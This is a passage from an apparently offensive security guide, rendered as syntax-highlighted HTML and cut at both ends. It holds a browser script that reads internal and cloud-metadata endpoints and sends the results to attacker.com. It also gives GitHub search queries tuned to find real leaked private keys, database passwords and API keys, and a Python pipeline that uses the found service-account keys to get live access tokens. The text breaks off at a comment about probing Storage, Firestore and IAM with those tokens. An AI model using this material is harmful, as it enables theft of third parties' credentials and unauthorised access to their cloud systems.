&lt;a href="#134-ssrf-via-public-buckets"&gt;
##
&lt;/a&gt;
13.4 SSRF via Public Buckets
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;If a bucket is publicly writable and serves HTML with the correct Content-Type:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-html" data-lang="html"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#ca9ee6"&gt;script&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// SSRF via victim&amp;#39;s browser
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;async&lt;/span&gt; &lt;span style="color:#e78284"&gt;function&lt;/span&gt; ssrf() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#e78284"&gt;let&lt;/span&gt; targets &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;http://localhost:8080/actuator/env&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;http://127.0.0.1:9200/&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;http://169.254.169.254/latest/meta-data/&amp;#39;&lt;/span&gt;, &lt;span style="color:#737994;font-style:italic"&gt;// AWS metadata
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ];
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; (&lt;span style="color:#e78284"&gt;let&lt;/span&gt; url &lt;span style="color:#ca9ee6"&gt;of&lt;/span&gt; targets) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;try&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#e78284"&gt;let&lt;/span&gt; r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ca9ee6"&gt;await&lt;/span&gt; fetch(url);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#e78284"&gt;let&lt;/span&gt; data &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ca9ee6"&gt;await&lt;/span&gt; r.text();
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;new&lt;/span&gt; Image().src &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;https://attacker.com/exfil?data=&amp;#39;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#99d1db"&gt;encodeURIComponent&lt;/span&gt;(data);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; } &lt;span style="color:#ca9ee6"&gt;catch&lt;/span&gt;(e) {}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ssrf();
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;/&lt;span style="color:#ca9ee6"&gt;script&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;hr&gt;
&lt;h2 id="14-code-leaks--github-gitlab-docker-hub-npm" &gt;
&lt;div&gt;
&lt;a href="#14-code-leaks--github-gitlab-docker-hub-npm"&gt;
#
&lt;/a&gt;
14. CODE LEAKS — GITHUB, GITLAB, DOCKER HUB, NPM
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="141-github-code-search--the-most-effective-tool" &gt;
&lt;div&gt;
&lt;a href="#141-github-code-search--the-most-effective-tool"&gt;
##
&lt;/a&gt;
14.1 GitHub Code Search — The Most Effective Tool
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;With personal token&lt;/strong&gt; (much better results than without auth):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Setup&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;gh auth login
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f2d5cf"&gt;GH_TOKEN&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;gh auth token&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="search-patterns-that-work" &gt;
&lt;div&gt;
&lt;a href="#search-patterns-that-work"&gt;
###
&lt;/a&gt;
Search Patterns That Work
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;headers &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {&lt;span style="color:#a6d189"&gt;&amp;#34;Authorization&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;token &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;GH_TOKEN&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;base &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;https://api.github.com/search/code&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# SA Keys (Firebase/GCP) — ~1 in 30 is valid&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;params &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {&lt;span style="color:#a6d189"&gt;&amp;#34;q&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#39;&amp;#34;type&amp;#34;: &amp;#34;service_account&amp;#34; &amp;#34;private_key&amp;#34; &amp;#34;project_id&amp;#34;&amp;#39;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# .env with real credentials&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;params &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {&lt;span style="color:#a6d189"&gt;&amp;#34;q&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#39;DB_PASSWORD+DB_HOST+APP_KEY+filename:.env+NOT+example+NOT+your+NOT+test&amp;#39;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Supabase URLs + keys&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;params &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {&lt;span style="color:#a6d189"&gt;&amp;#34;q&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#39;supabase.co+SUPABASE_URL+SUPABASE_ANON_KEY+NOT+example+NOT+your&amp;#39;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# AWS Keys&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;params &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {&lt;span style="color:#a6d189"&gt;&amp;#34;q&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#39;AKIA+filename:.env+NOT+example+NOT+your&amp;#39;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# SendGrid keys&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;params &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {&lt;span style="color:#a6d189"&gt;&amp;#34;q&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#39;SG.+filename:.env+NOT+example&amp;#39;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# MongoDB connection strings&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;params &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {&lt;span style="color:#a6d189"&gt;&amp;#34;q&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#39;mongodb+srv://+password+extension:env+NOT+example&amp;#39;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Specific Firebase SA keys&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;params &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {&lt;span style="color:#a6d189"&gt;&amp;#34;q&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#39;firebase-adminsdk+private_key_id+private_key+extension:json+NOT+test&amp;#39;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Google OAuth credentials&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;params &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {&lt;span style="color:#a6d189"&gt;&amp;#34;q&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#39;&amp;#34;client_id&amp;#34; &amp;#34;client_secret&amp;#34; &amp;#34;redirect_uris&amp;#34; extension:json&amp;#39;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Mercado Pago keys&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;params &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {&lt;span style="color:#a6d189"&gt;&amp;#34;q&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#39;APP_USR- extension:js NOT example NOT test&amp;#39;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Laravel .env with secrets&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;params &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {&lt;span style="color:#a6d189"&gt;&amp;#34;q&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#39;APP_KEY=base64 filename:.env NOT example&amp;#39;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="142-pipeline-for-testing-sa-keys-found-on-github" &gt;
&lt;div&gt;
&lt;a href="#142-pipeline-for-testing-sa-keys-found-on-github"&gt;
##
&lt;/a&gt;
14.2 Pipeline for Testing SA Keys Found on GitHub
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;glob&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;json&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;def&lt;/span&gt; &lt;span style="color:#8caaee"&gt;test_sa_key&lt;/span&gt;(sa_json):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&amp;#34;&amp;#34;Tests whether an SA key found on GitHub is still valid and generates a token.&amp;#34;&amp;#34;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#81c8be"&gt;from&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;cryptography.hazmat.primitives&lt;/span&gt; &lt;span style="color:#81c8be"&gt;import&lt;/span&gt; hashes, serialization
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#81c8be"&gt;from&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;cryptography.hazmat.primitives.asymmetric&lt;/span&gt; &lt;span style="color:#81c8be"&gt;import&lt;/span&gt; padding &lt;span style="color:#ca9ee6"&gt;as&lt;/span&gt; pad
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#81c8be"&gt;from&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;cryptography.hazmat.backends&lt;/span&gt; &lt;span style="color:#81c8be"&gt;import&lt;/span&gt; default_backend
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;base64&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;time&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;requests&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; now &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#99d1db"&gt;int&lt;/span&gt;(time&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;time())
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; header &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; base64&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;urlsafe_b64encode(json&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;dumps({&lt;span style="color:#a6d189"&gt;&amp;#34;alg&amp;#34;&lt;/span&gt;:&lt;span style="color:#a6d189"&gt;&amp;#34;RS256&amp;#34;&lt;/span&gt;,&lt;span style="color:#a6d189"&gt;&amp;#34;typ&amp;#34;&lt;/span&gt;:&lt;span style="color:#a6d189"&gt;&amp;#34;JWT&amp;#34;&lt;/span&gt;})&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;encode())&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;rstrip(&lt;span style="color:#e78284"&gt;b&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;=&amp;#39;&lt;/span&gt;)&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;decode()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; claims &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {&lt;span style="color:#a6d189"&gt;&amp;#34;iss&amp;#34;&lt;/span&gt;: sa_json[&lt;span style="color:#a6d189"&gt;&amp;#39;client_email&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;scope&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;https://www.googleapis.com/auth/cloud-platform&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;aud&amp;#34;&lt;/span&gt;: sa_json[&lt;span style="color:#a6d189"&gt;&amp;#39;token_uri&amp;#39;&lt;/span&gt;], &lt;span style="color:#a6d189"&gt;&amp;#34;iat&amp;#34;&lt;/span&gt;: now, &lt;span style="color:#a6d189"&gt;&amp;#34;exp&amp;#34;&lt;/span&gt;: now&lt;span style="color:#99d1db;font-weight:bold"&gt;+&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;3600&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; payload &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; base64&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;urlsafe_b64encode(json&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;dumps(claims)&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;encode())&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;rstrip(&lt;span style="color:#e78284"&gt;b&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;=&amp;#39;&lt;/span&gt;)&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;decode()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; key &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; load_pem_private_key(sa_json[&lt;span style="color:#a6d189"&gt;&amp;#39;private_key&amp;#39;&lt;/span&gt;]&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;encode(), password&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;None&lt;/span&gt;, backend&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;default_backend())
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; signature &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; base64&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;urlsafe_b64encode(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; key&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;sign(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;header&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;payload&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;encode(), pad&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;PKCS1v15(), hashes&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;SHA256())
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;rstrip(&lt;span style="color:#e78284"&gt;b&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;=&amp;#39;&lt;/span&gt;)&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;decode()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; resp &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;post(sa_json[&lt;span style="color:#a6d189"&gt;&amp;#39;token_uri&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;grant_type=urn:ietf:params:oauth:grant-type:jwt-bearer&amp;amp;assertion=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;header&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;payload&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;signature&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;encode(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; headers&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#39;Content-Type&amp;#39;&lt;/span&gt;:&lt;span style="color:#a6d189"&gt;&amp;#39;application/x-www-form-urlencoded&amp;#39;&lt;/span&gt;}, timeout&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;10&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; resp&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code &lt;span style="color:#99d1db;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;200&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;return&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;True&lt;/span&gt;, resp&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;json()&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#39;access_token&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;return&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;False&lt;/span&gt;, &lt;span style="color:#ef9f76"&gt;None&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Find and test SA keys&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; fpath &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; glob&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;glob(&lt;span style="color:#a6d189"&gt;&amp;#39;/tmp/sa_key_*.json&amp;#39;&lt;/span&gt;):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;with&lt;/span&gt; &lt;span style="color:#99d1db"&gt;open&lt;/span&gt;(fpath) &lt;span style="color:#ca9ee6"&gt;as&lt;/span&gt; f:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sa &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; json&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;load(f)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; valid, token &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; test_sa_key(sa)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; status &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;✅ VALID&amp;#34;&lt;/span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; valid &lt;span style="color:#ca9ee6"&gt;else&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;❌ REVOKED&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;status&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; | &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;sa[&lt;span style="color:#a6d189"&gt;&amp;#39;project_id&amp;#39;&lt;/span&gt;]&lt;span style="color:#a6d189"&gt;:&lt;/span&gt;&lt;span style="color:#a6d189"&gt;30s&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; | &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;sa[&lt;span style="color:#a6d189"&gt;&amp;#39;client_email&amp;#39;&lt;/span&gt;][:&lt;span style="color:#ef9f76"&gt;40&lt;/span&gt;]&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; valid:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# With the token, test access to Storage, Firestore, IAM&lt;/span&gt;
